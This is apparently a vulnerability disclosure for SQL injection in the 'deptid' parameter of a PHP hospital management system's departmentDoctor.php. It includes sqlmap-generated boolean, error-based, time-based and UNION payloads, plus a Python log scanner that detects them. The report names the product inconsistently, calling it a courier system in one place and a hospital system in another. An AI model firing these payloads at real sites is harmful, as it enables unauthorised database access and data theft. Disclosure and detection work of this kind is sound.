The fourth line of the departmentDoctor.php file retrieves user input from the $_GET element. The value of this element is then passed to the code without proper sanitization or validation, and is ultimately used in a database query on line 5 of the departmentDoctor.php file. This may lead to SQL injection attacks.
Impact
Attackers can exploit this vulnerability to gain database privileges, which can result in the exposure of a large amount of data in the database. If the target database runs with DBA privileges, this may lead to privileges on the server host being obtained.
DESCRIPTION
ZhaoBin Huang has discovered that, due to insufficient protection of the "deptid" parameter in the "\departmentDoctor.php" file, there is a serious security vulnerability in the "Best courier management system project in php". This vulnerability may be used to inject malicious SQL queries, resulting in unauthorized access and extraction of sensitive information from the database.
Payload
deptid=12' AND (SELECT 2306 FROM(SELECT COUNT(*),CONCAT(0x716b707671,(SELECT (ELT(2306=2306,1))),0x71786a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'vptK'='vptK
---
Parameter: deptid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: deptid=12' AND 9424=9424 AND 'hYov'='hYov
Vector: AND [INFERENCE]
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: deptid=12' AND (SELECT 2306 FROM(SELECT COUNT(*),CONCAT(0x716b707671,(SELECT (ELT(2306=2306,1))),0x71786a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'vptK'='vptK
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: deptid=12' AND (SELECT 3022 FROM (SELECT(SLEEP(5)))IfUz) AND 'rvxr'='rvxr
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: deptid=12' UNION ALL SELECT CONCAT(0x716b707671,0x6b5a4352647756625962434873434d55424c6d437a47745664726d4b736c52667772717653687444,0x71786a6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
Vector: UNION ALL SELECT [QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
This shows the payloads produced by running sqlmap.
The following is the database name displayed after the attack was carried out successfully with sqlmap.
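A defender-side check for the requests listed above, as an added example that is not part of the original report: it scans web access logs for requests to departmentDoctor.php whose deptid is not a plain integer and labels each with the sqlmap technique type it resembles. The combined log format, the sample lines (documentation IPs, payloads shortened from the report) and the assumption that deptid is a numeric id are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: deptid is a numeric department id (the report's payloads all start at deptid=12).
VALID_DEPTID = re.compile(r"[0-9]{1,10}")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# One signature per sqlmap technique type listed in the report, checked in this order.
SIGNATURES = [
    ("union", re.compile(r"\bunion\b.+\bselect\b", re.I | re.S)),
    ("time-based", re.compile(r"\bsleep\s*\(", re.I)),
    ("error-based", re.compile(r"floor\s*\(\s*rand\s*\(", re.I)),
    ("boolean-based", re.compile(r"'\s*(?:and|or)\s+\d+\s*=\s*\d+", re.I)),
]

# Constructed access-log lines; not taken from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /departmentDoctor.php?deptid=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /departmentDoctor.php?deptid=12%27%20AND%209424%3D9424%20AND%20%27hYov%27%3D%27hYov HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:06 +0000] "GET /departmentDoctor.php?deptid=12%27%20AND%20(SELECT%202306%20FROM(SELECT%20COUNT(*),CONCAT(0x716b707671,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27vptK%27%3D%27vptK HTTP/1.1" 200 812',
    '198.51.100.7 - - [01/Jan/2024:10:00:12 +0000] "GET /departmentDoctor.php?deptid=12%27%20AND%20(SELECT%203022%20FROM%20(SELECT(SLEEP(5)))IfUz)%20AND%20%27rvxr%27%3D%27rvxr HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:13 +0000] "GET /departmentDoctor.php?deptid=12%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL--%20- HTTP/1.1" 200 5300',
]

def classify(value):
    """Return None for a well-formed deptid, else the matching technique or 'malformed'."""
    if VALID_DEPTID.fullmatch(value):
        return None
    for name, pattern in SIGNATURES:
        if pattern.search(value):
            return name
    return "malformed"

def scan(lines, path="/departmentDoctor.php"):
    """Return (client, verdict, decoded deptid) for every request with a bad deptid."""
    findings = []
    for line in lines:
        match = REQUEST.search(line)
        url = urlsplit(match.group(1)) if match else None
        if url is None or not url.path.endswith(path):
            continue
        # parse_qs percent-decodes, so encoded quotes and spaces are matched in clear.
        for value in parse_qs(url.query, keep_blank_values=True).get("deptid", []):
            verdict = classify(value)
            if verdict:
                findings.append((line.split()[0], verdict, value))
    return findings

if __name__ == "__main__":
    for client, verdict, value in scan(SAMPLE_LOG):
        print(client, verdict, value, sep="\t")
```

The allow-list in `VALID_DEPTID` is the stronger signal: any deptid that fails it is reported even when no signature matches, so the signatures only add a label for triage.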
SourceCodester Online Hospital Management System Using PHP/MySQL departmentDoctor.php V1.0 SQL injection vulnerability